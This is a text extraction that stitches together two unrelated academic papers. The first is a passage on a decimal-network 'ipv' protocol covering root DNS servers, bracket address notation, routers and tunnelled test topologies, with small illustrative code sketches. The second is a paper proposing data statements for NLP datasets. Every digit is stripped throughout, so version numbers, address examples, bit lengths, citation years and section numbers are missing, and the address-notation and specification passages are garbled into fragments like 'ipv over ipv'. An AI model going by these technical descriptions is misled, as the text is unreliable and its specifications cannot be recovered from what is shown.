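the connect-before-send discipline described above can be pictured with a small conceptual sketch. the classes and method names below are hypothetical and are not part of any published ipv api; the sketch only illustrates the contrast between the three-layer virtual-circuit path (set up the link, transmit, then withdraw the link) and the connectionless four-layer packet path.

class VirtualCircuit:
    # models the three-layer path: reserve the link, send, then release it
    def __init__(self, src, dst):
        self.src, self.dst, self.established = src, dst, False

    def establish(self):
        self.established = True          # resource reservation / link setup

    def send(self, payload: bytes):
        if not self.established:
            raise RuntimeError("link must be established before transmission")
        print(f"circuit {self.src}->{self.dst}: {len(payload)} bytes on reserved bandwidth")

    def release(self):
        self.established = False         # link withdrawn after transmission completes

def send_packet(src, dst, payload: bytes):
    # models the ordinary four-layer path: connectionless, per-packet best effort
    print(f"packet {src}->{dst}: {len(payload)} bytes, best-effort")

# usage: media uses the circuit discipline, everything else stays packet-switched
vc = VirtualCircuit("user alpha", "user beta")
vc.establish()
vc.send(b"\x00" * 10_000_000)            # a long stream, e.g. video
vc.release()
send_packet("user alpha", "user beta", b"hello")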
the ipv automatic allocation access system uses openvpn to set up a virtual private network, uses ip tunnels for over data transmission, and uses tr as the control protocol to push data to the terminal, so as to achieve ipv subnet-to-subnet or ipv transmission. the transmission can take place between different individual routers, between routers of the same enterprise, or between enterprise or individual routers and backbone routers. openvpn is adopted to penetrate the subnet and form the proprietary virtual network, and on the basis of this virtual network an ip tunnel is implemented to complete the over data transmission. within the virtual private network, the tr protocol is used to push the automatically assigned personal address or the manually assigned business address, and at the same time the to of the individual or business is automatically pushed to the device router.

the ipv network management system is a comprehensive, web-based network management system that provides network monitoring and other functions. it can monitor various network and server parameters to ensure the safe operation of the server system. both the ipv and ipv protocols are supported, and flexible notification mechanisms are provided so that system administrators can quickly locate and resolve problems. ipv networks and ipv /ipv hybrid networks are constructed using ipv routers, clients, protocol conversion routers and other devices. the system includes the ipv future network root domain name system, promoting technology integration, business integration and data integration, and realizing cross-level, cross-region, cross-system, cross-department and cross-business collaborative management and services. an integrated national big data center and gateway bureau will be built through data centralization and sharing, together with a secure and controllable information technology system.

c. root domain name server
the ipv root dns server is mainly used to manage the internet and decimal network home directory. the ipv root name server system consists of a parent root server, a primary root server, root name servers named n-z, top-level domain servers named with three-character country and region codes such as ·chn, ·usa, ·hkg and ·mac, a routing management system, application servers and gigabit backbone routers. the china decimal network standards working group is responsible for the management of the decimal network root name servers, the domain name system, and ip addresses. the operating principle is that the root domain name servers first read from the primary root server, which in turn reads from the parent root server to obtain the data, which then spreads to the whole network. the root dns servers are all equal. the system includes the parent root server and the primary root server; this hidden publishing host is accessed only by the root domain name servers, which are in turn read by mirror servers.
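the publication chain just described (a hidden parent root feeding a primary root, which feeds the n-z root servers and their mirrors) can be modeled in a few lines of code. the sketch below is only a toy model; the class, server names and zone contents are hypothetical and are not drawn from the ipv implementation.

class Server:
    def __init__(self, name, upstream=None):
        self.name, self.upstream, self.zone = name, upstream, {}

    def publish(self, zone: dict):
        self.zone = dict(zone)               # only the hidden parent root publishes

    def refresh(self):
        if self.upstream is not None:
            self.upstream.refresh()          # pull the newest data down the chain
            self.zone = dict(self.upstream.zone)

parent_root = Server("parent root (hidden)")
primary_root = Server("primary root", upstream=parent_root)
roots = [Server(f"root {c}", upstream=primary_root) for c in "nopqrstuvwxyz"]
mirror = Server("mirror", upstream=roots[0])

parent_root.publish({"chn": "national domain name server for chn"})
mirror.refresh()                              # propagates parent -> primary -> root n -> mirror
print(mirror.zone)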
the ipv root name server system is shown in figure .

figure . the ipv root name server system (a primary root server and a virtual cloud root server feed the root domain name servers named n through z; through ipv / routers these connect to tld servers and national domain name servers such as ·chn, ·usa and ·hkg, alongside an ipv /v network management server, a basket management system and a client presentation system).

the root name server is the highest-level domain name server in the dns (domain name system) and is responsible for providing the authoritative domain name server addresses for resolving tlds (top-level domains). at present, the root dns servers, the gtlds (generic top-level domains) and the cctlds (country/region top-level domains) are managed and controlled by icann (internet corporation for assigned names and numbers). the domain name system is a basic service of the internet, and the root servers are the foundation of the whole domain name system. the ipv -based root domain name resolution system can adapt to ipv , ipv and ipv networks. the ipv resolution system can resolve an internet user's domain name through the domain name servers to obtain the ip address of the corresponding access object, and can forward requests for non-digital domain names to the corresponding english, chinese or other-language domain name servers, remaining compatible with current domain name services.

iii. the text representation of ipv address
the text representation of an ipv address includes the "square brackets decimal" notation, the "curly brackets decimal" notation, and the "round brackets decimal" notation.

a. square brackets decimal
the bracket decimal notation can be expressed in the following two ways:
1) bits are represented by "[]". the bits inside the "[]" symbol are expressed in decimal notation and can be written with indefinite length.
2) an ipv address representation with a length of bits takes the form " y[y[y[y[y[y[y[y", where each y represents a -bit part of the address and is expressed in decimal. = , so y is a decimal number of ten digits. for example: [ ] [ ] [ ] . in the address representation, multiple consecutive zeros to the left of each decimal number can be omitted, but a decimal number that is entirely zero must still be represented by a single zero. a contiguous run of all-zero fields in the address is replaced by a pair of square brackets "[x]", where x is the number of segments in the all-zero run. the above address may therefore be written as [ [ ] [ [ .

b. curly brackets decimal
this method divides the -bit address into four -bit decimal numbers separated by curly braces. the representation takes the form "z}z}z}z", where each z represents a -bit portion expressed in decimal notation. its usage is exactly the same as that of y, and it is compatible with y, which greatly facilitates carrying current ipv addresses within ipv .
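since the digits in the published examples did not survive text extraction, the exact segment count and widths are assumptions here; the sketch below only illustrates the general mechanics of the square-bracket decimal notation described above (decimal fields joined by "[", omission of leading zeros, and compression of an all-zero run into "[x]") for an assumed layout of eight 32-bit segments.

# a sketch of the square-bracket decimal notation; the segment count and width
# are assumptions, since the exact figures did not survive extraction.
def format_bracket_decimal(segments):
    # render segments as decimal fields joined by '[', compressing the longest
    # run of all-zero fields into '[x]' where x is the run length
    best_start, best_len, run_start = -1, 0, None
    for i, seg in enumerate(list(segments) + [None]):      # sentinel closes a trailing run
        if seg == 0 and run_start is None:
            run_start = i
        elif seg != 0 and run_start is not None:
            if i - run_start > best_len:
                best_start, best_len = run_start, i - run_start
            run_start = None
    fields = [str(s) for s in segments]                     # decimal, no leading zeros
    if best_len > 1:                                        # compress only genuine runs
        fields[best_start:best_start + best_len] = [f"[{best_len}]"]
    return "[".join(fields)

print(format_bracket_decimal([86, 21, 0, 0, 0, 0, 18, 1]))  # prints 86[21[[4][18[1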
c. round brackets decimal
since the address length of ipv defaults to bits, there are still many bits in each segment regardless of how many segments are used; for example, each segment still has bits with an -segment representation. as a result, long repetitive runs such as "...] ]..." appear in the written address. such a representation is not only cumbersome to input but also error-prone. for convenience, the parenthesis notation (k/l) is introduced, where "k" is the repeated digit and "l" is the number of repetitions. the above example can then be abbreviated as "...]( / ) of ]...".

d. a text representation of the address prefix
the ipv address scheme is similar to the supernetting and cidr (classless inter-domain routing) schemes of ipv , which use an address prefix to represent the network hierarchy. the ipv address prefix is represented with a cidr-like notation of the form ipv -address/prefix-length. the address itself is written in ipv address notation, and the prefix length is the number of contiguous bits, counted from the leftmost part of the address, that form the prefix. for example, the -bit address prefix [ ] [ [ ] [ ] can be expressed as [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]/ , or in short form [ ] [ ]/ . the ping implementation for a decimal network ipv address is shown in figure .

figure . the ping implementation of the decimal network ipv address.

iv. implementation of ipv system
the ipv protocol realizes the earlier assumptions of extending the address length from the current -bit address to a -bit address with direct routing, and of extending the original class-based router addressing method to a -layer route addressing method. starting from the deficiencies of the present network and the actual demands of the future network, a new address scheme, domain name system and routing addressing theory are studied to solve the problems of network resources and engineering implementation. in order to be compatible with the existing internet, dual stack technology is adopted. dual stack technology refers to enabling both the ipv stack and the ipv stack on a single device, so that the device can communicate with both ipv and ipv networks. if the device is a router, its interfaces are configured with both ipv and ipv addresses and can connect to ipv and ipv networks. if the device is a computer, it has both an ipv address and an ipv address, and the ability to handle both. the ipv dual protocol stack is shown in figure .

figure . the ipv dual protocol stack.

a. hardware components
the ipv system hardware devices are composed as follows:
1) core router: core routers, also known as "backbone routers", are routers located in the center of the network, while routers located on the edge of the network are called access routers. core routers and edge routers are relative concepts: both are routers, but they come in different sizes and capacities, and the core router of one layer is the edge router of another layer. the core router is used in the ipv core network environment to realize large-capacity data exchange.
3) ipv -ipv protocol conversion router. the ipv -ipv protocol conversion router is used for mutual conversion between the ipv and ipv protocols. ipv protocol data is converted to ipv protocol data using preset mapping rules through the to network interface device, and ipv protocol data is converted to ipv protocol data in the same way.

4) embedded router. the embedded router is a low-cost user-side access router. it can be easily deployed wherever access to the ipv network and the internet is required.

5) client system. the client system supports centos . -bit and centos -bit clients, as well as later mainstream linux releases. an ipv virtual machine that supports vmware allows customers to deploy quickly on existing hardware devices. windows , and clients are supported on the basis of the windows ipv protocol stack.

6) beidou/gps timing server. the timing server supports beidou and gps satellite signals and provides an ntp server over the ipv and ipv protocols. user devices can be timed over either the ipv or the ipv protocol.

b. software system

1) ipv network management system. the ipv network management system is a comprehensive, web-based network management system that provides network monitoring and related functions. it can monitor various network parameters and server parameters to ensure the secure operation of the server system. both the ipv and ipv protocols are supported, and flexible notification mechanisms are provided so that system administrators can quickly locate and resolve problems.

2) ipv automatic allocation access system. the system sets up a virtual private network with openvpn, uses an ip tunnel for over data transmission, and uses tr as the control protocol to push data to the terminals, finally realizing ipv subnet-to-subnet or ipv transmission. ipv subnet-to-subnet or ipv transmission can be implemented between different personal routers, within the same enterprise router, or between enterprise and personal routers up to the backbone routes. openvpn is adopted to penetrate the subnets and form the proprietary virtual network; the ip tunnel then completes the over data transmission on top of that virtual network. within the virtual private network, the tr protocol is used to push the automatically assigned personal addresses and the manually assigned enterprise addresses, and at the same time the to of the individual or enterprise is automatically pushed to the device router.

3) ipv windows protocol stack. based on the original ipv and ipv protocols of the windows operating system, the ipv protocol is added to realize dual-stack working access.

v. application of ipv system

we designed the following scenarios to reflect the features and advantages of the ipv network system more fully.

a. application 1: pure ipv network architecture

this application implements a pure ipv network architecture. the simplest system includes ipv client/server a, ipv client/server b, and g ipv routers c and d. the network topology is shown in figure .

figure . pure ipv client-server test topology

the pure ipv network architecture is suitable for building a pure ipv network in one area and establishing an independent ipv network system.

b. application 2: ipv network applications connected via a pure ipv network

this application implements communication between ipv network applications through a pure ipv network. the simplest system includes ipv client/server a, ipv client/server b, and ipv g routers c and d. the network topology is shown in figure .
figure . ipv network application test topology through pure ipv network connection

this scenario is suitable for several ipv networks in different regions connected through the ipv core network, achieving penetration access between the different ipv networks. a main feature is that, apart from the existing ipv network, the other areas use the ipv protocol for transmission, which requires a private network connection (such as optical fiber, a ddn line, etc.) between the different ipv networks.

c. application 3: ipv network connected through an over tunnel

this application implements ipv network application communication through an over tunnel. the simplest system includes ipv client/server a, ipv client/server b, and ipv g routers c and d. the biggest difference from the previous scenario is that the ipv public network address between routers c and d is carried over over tunnel communication. this scenario simulates ipv using the existing ipv public network to achieve ipv network connectivity across different geographic regions, and it has the ability to scale to a national network. the network topology is shown in figure .

figure . ipv network test topology through over tunnel connection

ipv networks in different areas are connected through the ipv over ipv core network to achieve transparent access between the different ipv networks. a major feature is that the system uses the existing ipv networks between the core networks and communicates via the over tunnel mode. it uses the existing ipv public network to quickly establish connections between regional ipv networks and achieve penetration access.

d. application 4: ipv network connected through an over tunnel

this application implements ipv network application communication through an over tunnel. the simplest system includes ipv client/server a, ipv client/server b, and ipv g routers c and d. the network topology is shown in figure .

figure . ipv network test topology through over tunnel connection

the application implements the ipv network connecting through the ipv over ipv core network to achieve transparent access between different ipv networks. a major feature is the use of the existing ipv networks between the core networks, communicating via the over tunnel mode.

e. application 5: hybrid network architecture

in this application, the client side of an ipv access router accesses the ipv network and the ipv network. the network sides of multiple ipv access routers access the user side of the same core router, and the network side of the core router accesses the ipv network and the ipv network (including the public network). the application can achieve the following functions: (1) an ipv client penetrates the private network to access the ipv clients of other subnets; (2) an ipv client accesses the internet normally; (3) an ipv client accesses the ipv clients of other autonomous domains; (4) the ospfv dynamic routing protocol is used between access routers to establish the network; (5) ipv core routers can choose to use the over network to access the shanghai node ipv network, or use the pure ipv protocol to access the beijing node ipv network. the network topology is shown in figure .
figure . ipv hybrid network architecture test topology (ipv and ipv clients behind access routers ty-gd g, aggregated through backbone routers ty-gd g and an ipv /ipv switch ty-gdsw, with an over connection to the shanghai backbone node, a pure ipv connection to the beijing backbone node, and access to the ipv internet)

this application scenario is mainly used to build an ipv network environment and to seamlessly integrate ipv networks and ipv networks. all ipv and ipv network islands are connected using the ipv protocol or the existing ipv public network. using the ipv network system, it is convenient and fast to connect independent networks in different regions into a nationally unified network.

f. application 6: ipv root domain name agent system

the ipv root domain name system provides a system expansion support capability compatible with the rfc protocols, backed by a powerful database, and forms a symbiotic relationship with the existing ipv domain name system. at the same time, it provides an independent and controllable application guarantee for ipv domain names. the system network includes three parts: the ipv domain name back-end support system, the routing and network service system, and the application system. the ipv domain name back-end support system can be deployed in a grid; deployments in shanghai and beijing establish a root domain extension support environment that is both organic and relatively independent. the routing and network service system can use ipv , ipv or ipv networks. the application system includes mobile terminal and desktop platform support systems. the network topology is shown in figure .

figure . ipv root domain name proxy system topology

figure . ipv root domain name proxy system analysis results

vi. summary

the main technical features and innovations of the ipv system are as follows.

1) independent address text format. decimal network technology can be networked independently of the original ipv and ipv networks. the ipv address text representation of the decimal network uses decimal arabic numerals with "[" as the separator, and it is compatible with ipv and ipv .

2) infinite ip address space. the length of an ipv address is , and can be up to . it conforms to the assumptions of the iso future network documents n , n and n and of rfc and rfc . the address resources are very rich, and end-to-end transmission can be achieved according to requirements, with high efficiency and economy. the ipv address uses a technique of two-sided compression, with brackets marking the compressed section, which is simple and convenient to use.

3) safe and controllable. ipv uses a specific encryption mechanism for addresses to achieve point-to-point transmission and enhance user privacy. in order to ensure the healthy and orderly development of information services, verification before communication makes it possible to temporarily close access to businesses whose security measures are incomplete or unqualified. ipv networking is independent of the ipv and ipv internet, so network security and information security can be managed and controlled effectively.
according to actual needs, users can choose to download valuable information and to use methods that avoid the intrusion of bad information and unexpected attacks.

4) unified coding. the domain name and the ip address are synthesized, which makes it possible to combine the telephone number, the handset, the domain name and the ip address, iptv, the ip telephone and so on into one number. this method saves the translation time between the domain name and the ip address, makes network communication fast and convenient, and improves the communication capability of the existing network switching equipment. at present, electronic labels and bar codes are used and managed separately. ipv has developed a more superior and more viable unified data format and application standard system for rfid electronic tags and barcodes. it can unify the electronic label and the barcode into one code, so that a commodity code has three ways of identification: one-dimensional barcode, two-dimensional code and electronic label; the three representations are a globally unique code and are also the ip address of the ipv domain name. this feature gives barcodes and electronic tags the same internet access capabilities, which will greatly reduce the management costs of the global manufacturing and logistics industries.

acknowledgment

this paper is sponsored by xi'an decimal network technology co., ltd.

references

[ ] xie jianping et al. method of using whole digital code to assign address for computer [p]. us patent.
[ ] internet protocol, darpa internet program protocol specification. rfc, internet standard.
[ ] s. deering, r. hinden. internet protocol, version (ipv ) specification. rfc, network working group.
[ ] m. crawford. transmission of ipv packets over ethernet networks. rfc, network working group.
[ ] j. onions. a historical perspective on the usage of ip version . rfc, network working group.
[ ] v. cerf. a view from the st century. rfc, network working group.
[ ] xie jianping, xu dongmei, et al. digital domain name specification. sj/t - .
[ ] information technology - future network - problem statement and requirement - part : naming and addressing. iso/iec dtr - .
[ ] wenfeng, xie jianping, et al. product and service digital identification format for information processing. sj/t - .
[ ] radio frequency identification tag information query service network architecture technical specification. sj/t - .

data statements for natural language processing: toward mitigating system bias and enabling better science

emily m. bender, department of linguistics, university of washington, ebender@uw.edu
batya friedman, the information school, university of washington, batya@uw.edu

abstract

in this paper, we propose data statements as a design solution and professional practice for natural language processing technologists, in both research and development. through the adoption and widespread use of data statements, the field can begin to address critical scientific and ethical issues that result from the use of data from certain populations in the development of technology for other populations. we present a form that data statements can take and explore the implications of adopting them as part of regular practice.
we argue that data statements will help alleviate issues related to exclusion and bias in language technology; lead to better precision in claims about how nlp research can generalize and thus better engineering results; protect companies from public embarrassment; and ultimately lead to language technology that meets its users in their own preferred linguistic style and furthermore does not misrepresent them to others.

introduction

as technology enters widespread societal use it is important that we, as technologists, think critically about how the design decisions we make and systems we build impact people, including not only users of the systems but also other people who will be affected by the systems without directly interacting with them. for this paper, we focus on natural language processing (nlp) technology. potential adverse impacts include nlp systems that fail to work for specific subpopulations (e.g. children or speakers of language varieties which are not supported by training or test data) or systems that reify and reinforce biases present in training data (e.g. a resume-review system that ranks female candidates as less qualified for computer programming jobs because of biases present in training text). there are both scientific and ethical reasons to be concerned. scientifically, there is the issue of generalizability of results; ethically, the potential for significant real-world harms. while there is increasing interest in ethics in nlp, there remains the open and urgent question of how we integrate ethical considerations into the everyday practice of our field. (this interest has manifested in workshops (fort et al., ; devillers et al., ; hovy et al., ) and papers (hovy and spruit, ) in nlp, as well as workshops in related fields, notably the fatml series (http://www.fatml.org/) held annually since .) this question has no simple answer, but rather will require a constellation of multi-faceted solutions.

toward that end, and drawing on value sensitive design (friedman et al., ), this paper contributes one new professional practice, called data statements, which we argue will bring about improvements in engineering and scientific outcomes while also enabling more ethically responsive nlp technology. a data statement is a characterization of a dataset which provides context to allow developers and users to better understand how experimental results might generalize, how software might be appropriately deployed, and what biases might be reflected in systems built on the software. in developing this practice, we draw on analogous practices from the fields of psychology and medicine that require some standardized information about the populations studied (e.g. apa ; moher et al. ; furler et al. ; mbuagbaw et al. ). though the construct of data statements applies more broadly, in this paper we focus specifically on data statements for nlp systems. data statements should be included in most writing on nlp including: papers presenting new datasets, papers reporting experimental work with datasets, and documentation for nlp systems. data statements should help us as a field engage with the ethical issues of exclusion, overgeneralization, and underexposure (hovy and spruit, ).
furthermore, as data statements bring our datasets and their represented populations into better focus, they should also help us as a field deal with scientific issues of generalizability and reproducibility. adopting this practice will position us to better understand and describe our results and, ultimately, do better and more ethical science and engineering. (by arguing here that data statements promote both ethical practice and sound science, we do not mean to suggest that these two can be conflated. a system can give accurate responses as measured by some test set (scientific soundness) and yet lead to real-world harms (ethical issues). accordingly, it is up to researchers and research communities to engage with both scientific and ethical ideals.)

we begin by defining terms (§ ), discuss why nlp needs data statements (§ ) and relate our proposal to current practice (§ ). next is the substance of our contribution: a detailed proposal for data statements for nlp (§ ), illustrated with two case studies (§ ). in § we discuss how data statements can mitigate bias and use the technique of 'value scenarios' to envision potential effects of their adoption. finally, we relate data statements to similar emerging proposals (§ ), make recommendations for how to implement and promote the uptake of data statements (§ ), and lay out considerations for tech policy (§ ).

definitions

as this paper is intended for at least two distinct audiences (nlp technologists and tech policymakers), we use this section to briefly define key terms.

dataset, annotations. an (nlp) dataset is a collection of speech or writing possibly combined with annotations. (multi-modal datasets combine language and video or other additional signals; here, our focus is on linguistic data.) annotations include indications of linguistic structure like part of speech tags or syntactic parse trees, as well as labels classifying aspects of what the speakers were attempting to accomplish with their utterances. the latter includes annotations for sentiment (liu, ) and for figurative language or sarcasm (e.g. riloff et al. ; ptáček et al. ). labels can be naturally occurring, such as star ratings in reviews taken as indications of the overall sentiment of the review (e.g. pang et al. ) or the hashtag #sarcasm used to identify sarcastic language (e.g. kreuz and caucci ).

speaker. we use the term speaker to refer to the individual who produced some segment of linguistic behavior included in the dataset, even if the linguistic behavior is originally written.

annotator. annotator refers to people who assign annotations to the raw data, including transcribers of spoken data. annotators may be crowdworkers or highly trained researchers, sometimes involved in the creation of the annotation guidelines. annotation is often done semi-automatically, with nlp tools being used to create a first pass which is corrected or augmented by human annotators.

curator. a third role in dataset creation, less commonly discussed, is the curator. curators are involved in the selection of which data to include, by selecting individual documents, by creating search terms that generate sets of documents, by selecting speakers to interview and designing interview questions, etc.

stakeholders. stakeholders are people impacted directly or indirectly by a system (friedman et al., ; czeskis et al., ).
direct stakeholders include those who interact with the system, either by participating in system creation (developers, speakers, annotators and curators) or by using it. indirect stakeholders do not use the system but are nonetheless impacted by it. for example, people whose web content is displayed or rendered invisible by search engine algorithms are indirect stakeholders with respect to those systems.

algorithm. we use the term algorithm to encompass both rule-based and machine learning approaches to nlp. some algorithms (typically rule-based ones) are tightly connected to the datasets they are developed against. other algorithms can be easily ported to different datasets. (datasets used during algorithm development can influence design choices in machine learning approaches too: munro and manning ( ) found that subword information, not helpful in english sms classification, is extremely valuable in chichewa, a morphologically complex language with high orthographic variability.)

system. we use the term (nlp) system to refer to a piece of software that does some kind of natural language processing, typically involving algorithms trained on particular datasets. we use this term to refer to both components focused on specific tasks (e.g. the stanford parser (klein and manning, ) trained on the penn treebank (marcus et al., ) to do english parsing) and user-facing products such as amazon's alexa or google home.

bias. we use the term bias to refer to cases where computer systems "systematically and unfairly discriminate against certain individuals or groups of individuals in favor of others" (friedman and nissenbaum, , ). to be clear: (i) unfair discrimination does not give rise to bias unless it occurs systematically and (ii) systematic discrimination does not give rise to bias unless it results in an unfair outcome. (the machine learning community uses the term bias to refer to constraints on what an algorithm can learn, which may prevent it from picking up patterns in a dataset or lead it to relevant patterns more quickly (see coppin , ch. ); this use of the term does not carry connotations of unfairness.) friedman and nissenbaum ( ) show that in some cases, system bias reflects biases in society; these are pre-existing biases with roots in social institutions, practices and attitudes. in other cases, reasonable, seemingly neutral, technical elements (e.g. the order in which an algorithm processes data) can result in bias when used in real world contexts; these technical biases stem from technical constraints and decisions. a third source of bias, emergent bias, occurs when a system designed for one context is applied in another, e.g. with a different population.

why does nlp need data statements?

recent studies have documented the fact that limitations in training data lead to ethically problematic limitations in the resulting nlp systems. systems trained on naturally occurring language data learn the pre-existing biases held by the speakers of that data: typical vector-space representations of lexical semantics pick up cultural biases about gender (bolukbasi et al., ) and race, ethnicity and religion (speer, ). zhao et al. ( ) show that beyond picking up such biases, machine learning algorithms can amplify them. furthermore, these biases, far from being inert or simply a reflection of the data, can have real-world consequences for both direct and indirect stakeholders. for example, speer ( ) found that a sentiment analysis system rated reviews of mexican restaurants as more negative than other types of food with similar star ratings, because of associations between the word mexican and words with negative sentiment in the larger corpus on which the word embeddings were trained (see also kiritchenko and mohammad ). in these and other ways, pre-existing biases can be trained into nlp systems. there are other studies showing that systems from part of speech taggers (hovy and søgaard, ; jørgensen et al., ) to speech recognition engines (tatman, ) perform better for speakers whose demographic characteristics better match those represented in the training data. these are examples of emergent bias.

because the linguistic data we use will always include pre-existing biases and because it is not possible to build an nlp system in such a way that it is immune to emergent bias, we must seek additional strategies for mitigating the scientific and ethical shortcomings that follow from imperfect datasets. we propose here that foregrounding the characteristics of our datasets can help, by allowing reasoning about what the likely effects may be and by making it clearer which populations are and are not represented, for both training and test data. for training data, the characteristics of the dataset will affect how the system will work when it is deployed. for test data, the characteristics of the dataset will affect what can be measured about system performance and thus provide important context for scientific claims.

current practice and challenges

typical current practice in academic nlp is to present new datasets with a careful discussion of the annotation process as well as a brief characterization of the genre (usually by naming the underlying data source) and the language. nlp papers using datasets for training or test data tend to more briefly characterize the annotations and will sometimes leave out mention of genre and even language. (surveys of eacl (bender, ) and acl (munro, ) found %– % of papers failed to name the language studied; it always appeared to be english.) initiatives such as the open language archives community (olac; bird and simons ), the fostering language resources network (flarenet; calzolari et al. ) and the text encoding initiative (tei; consortium ) prescribe metadata to publish with language resources, primarily to aid in the discoverability of such resources. flarenet also encourages documentation of language resources. and yet, it is very rare to find detailed characterization of the speakers whose data is captured or the annotators who provided the annotations, though the latter are usually characterized as being experts or crowdworkers. (a notable exception is derczynski et al. ( ), who present a corpus of tweets collected to sample diverse speaker communities (location, type of engagement with twitter), at diverse points in time (time of year, month, and day), and annotated with named entity labels by crowdworker annotators from the same locations as the tweet authors.)

to fill this information gap, we argue that data statements should be included in every nlp publication which presents new datasets and in the documentation of every nlp system, as part of a chronology of system development including descriptions of the various datasets for training, tuning and testing. data statements should also be included in all nlp publications reporting experimental results. accordingly, data statements will need to be both detailed and concise. to meet these competing goals, we propose two variants. for each dataset there should be a long-form version in an academic paper presenting the dataset or in system documentation. (older datasets can be retrofitted with citeable long-form data statements published on project web pages or archives.) research papers presenting experiments making use of datasets with existing long-form data statements should include shorter data statements and cite the longer one.

we note another set of goals in competition: while readers need as much information as possible in order to understand how the results can and cannot be expected to generalize, considerations of the privacy of the people involved (speakers, annotators) might preclude including certain kinds of information, especially with small groups. each project will need to find the right balance, but this can be addressed in part by asking annotators and speakers for permission to collect and publish such information.

proposed data statement schema

we propose the following schema of information to include in long and short form data statements.

. long form

long form data statements should be included in system documentation and in academic papers presenting new datasets, and should strive to provide the following information:

a. curation rationale. which texts were included and what were the goals in selecting texts, both in the original collection and in any further sub-selection? this can be especially important in datasets too large to thoroughly inspect by hand. an explicit statement of the curation rationale can help dataset users make inferences about what other kinds of texts systems trained with them could conceivably generalize to.

b. language variety. languages differ from each other in structural ways that can interact with nlp algorithms. within a language, regional or social dialects can also show great variation (chambers and trudgill, ). the language and language variety should be described with:
• a language tag from bcp- identifying the language variety (e.g. en-us or yue-hant-hk); bcp- is specified at https://tools.ietf.org/rfc/bcp/bcp .txt
• a prose description of the language variety, glossing the bcp- tag and also providing further information (e.g. english as spoken in palo alto ca (usa), or cantonese written with traditional characters by speakers in hong kong who are bilingual in mandarin)

c. speaker demographic. sociolinguistics has found that variation (in pronunciation, prosody, word choice, and grammar) correlates with speaker demographic characteristics (labov, ), as speakers use linguistic variation to construct and project identities (eckert and rickford, ). transfer from native languages (l ) can affect the language produced by non-native (l ) speakers (ellis, , ch. ). a further important type of variation is disordered speech (e.g. dysarthria). specifications include:
• age
• gender
• race/ethnicity
• native language
• socio-economic status
• number of different speakers represented
• presence of disordered speech

d. annotator demographic. what are the demographic characteristics of the annotators and annotation guideline developers? their own 'social address' influences their experience with language and thus their perception of what they are annotating. specifications include:
• age
• gender
• race/ethnicity
• native language
• socio-economic status
• training in linguistics/other relevant discipline

e. speech situation. characteristics of the speech situation can affect linguistic structure and patterns at many levels. the intended audience of a linguistic performance can also affect linguistic choices on the part of speakers. (for example, people speak differently to close friends v. strangers, to small groups v. large ones, to children v. adults and to people v. machines (e.g. ervin-tripp ).) the time and place provide broader context for understanding how the texts collected relate to their historical moment and should also be made evident in the data statement. (mutable speaker demographic information, such as age, is interpreted as relative to the time of the linguistic behavior.) specifications include:
• time and place
• modality (spoken/signed, written)
• scripted/edited v. spontaneous
• synchronous v. asynchronous interaction
• intended audience

f. text characteristics. both genre and topic influence the vocabulary and structural characteristics of texts (biber, ), and should be specified.

g. recording quality. for data that includes audio/visual recordings, indicate the quality of the recording equipment and any aspects of the recording situation that could impact recording quality.

h. other. there may be other information of relevance as well (e.g. the demographic characteristics of the curators). as stated above, this is intended as a starting point and we anticipate best practices around writing data statements to develop over time.

i. provenance appendix. for datasets built out of existing datasets, the data statements for the source datasets should be included as an appendix.

. short form

short form data statements should be included in any publication using a dataset for training, tuning or testing a system and may also be appropriate for certain kinds of system documentation. the short form data statement does not replace the long form one, but rather should include a pointer to it. for short form data statements, we envision – word summaries of the description included in the long form, covering most of the main points.

. summary

we have outlined the kind of information data statements should include, addressing the needs laid out in § , describing both long and short versions. as the field gains experience with data statements, we expect to see a better understanding of what to include as well as best practices for writing data statements to emerge.

note that full specification of all of this information may not be feasible in all cases. for example, in datasets created from web text, precise demographic information may be unavailable. in other cases (e.g. to protect the privacy of annotators) it may be preferable to provide ranges rather than precise values. for the description of demographic characteristics, our field can look to others for best practices, such as those described in the american psychological association's manual of style.

it may seem redundant to reiterate this information in every paper that makes use of well-trodden datasets. however, it is critical to consider the data anew each time to ensure that it is appropriate for the nlp work being undertaken and that the results reported are properly contextualized. note that the requirement is not that datasets be used only when there is an ideal fit between the dataset and the nlp goals but rather that the characteristics of the dataset be examined in relation to the nlp goals and limitations be reported as appropriate.

case studies

we illustrate the idea of data statements with two case studies. ideally, data statements are written at or close to the time of dataset creation. these data statements were constructed post hoc in conversation with the dataset curators. the first entails labels for a particular subset of all twitter data. in contrast, the second entails all available data for an intentionally generated interview collection, including audiofiles and transcripts. both illustrate how even when specific information is not available, the explicit statement of its lack of availability provides a more informative picture of the dataset.
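before turning to the case studies, a minimal machine-readable rendering of the long-form schema may help make the fields concrete. the python sketch below is purely illustrative and not part of the proposal above: the field names simply mirror the schema headings, and the types and example values are assumptions.

```python
# purely illustrative sketch of a machine-readable long-form data
# statement; field names mirror the schema headings above, while the
# types and the example values are assumptions, not prescribed anywhere.
from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class DataStatement:
    curation_rationale: str
    language_variety_tag: str            # e.g. a BCP-47 tag such as "en-US"
    language_variety_prose: str
    speaker_demographic: dict            # age, gender, native language, ...
    annotator_demographic: dict
    speech_situation: dict               # time/place, modality, audience, ...
    text_characteristics: str            # genre and topic
    recording_quality: Optional[str] = None
    other: Optional[str] = None
    provenance: List[str] = field(default_factory=list)  # source data statements

# hypothetical example; all values invented for illustration only
example = DataStatement(
    curation_rationale="social media posts scraped with topic-specific search terms",
    language_variety_tag="en",
    language_variety_prose="mixed mainstream englishes as used on a microblogging platform",
    speaker_demographic={"age": "unknown", "native_language": "mostly english"},
    annotator_demographic={"experts": "small trained team", "crowdworkers": "recruited online"},
    speech_situation={"modality": "written", "interaction": "asynchronous"},
    text_characteristics="short informal posts on contentious topics",
)
```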
